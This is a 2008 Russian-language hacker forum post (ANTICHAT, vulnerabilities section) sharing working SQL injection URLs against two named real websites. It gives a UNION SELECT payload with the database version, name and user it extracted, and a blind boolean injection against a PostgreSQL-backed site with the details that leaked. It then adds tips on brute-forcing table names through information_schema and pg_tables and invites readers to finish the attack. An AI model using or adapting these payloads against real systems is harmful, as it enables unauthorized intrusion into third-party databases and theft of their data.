HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 23.07.2008, 19:10
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

пример того как умные програмеры хотят обмануть нас смертных что их сайт на хтмл

Constantine: mod_rewrite тебе ни о чем не говорит?

http://www.level.ro/stiri/2753+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT_W S(0x3a,Version(),Database(),User()),0x71),0x71),2/*/tekken_6.html

Database Version: 4.1.21-standard
Database name: level_nou
User name: level@localhost



подобрал табелку user но колонки так и не смог

http://autohit.ro/compare.php?modelId1=106+AND+ASCII(SUBSTRING((curr ent_database()),6,1))=xxx--


current_database() : autohit_ro
current_user() : autohit
version(): PostgreSQL


вывода нет, о можно побрутить сиптом, главное запрос правильно составить

не забывайте что тут есть Information_Schema или PG_TABLES
ну и конечно не забывайте что в
PostgreSQL оператор LIMIT сосоит из двух частей: LIMIT и OFFSET
табелки брутить не стал, оставляю это удовольствие вам

Последний раз редактировалось Constantine; 24.07.2008 в 01:23..
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.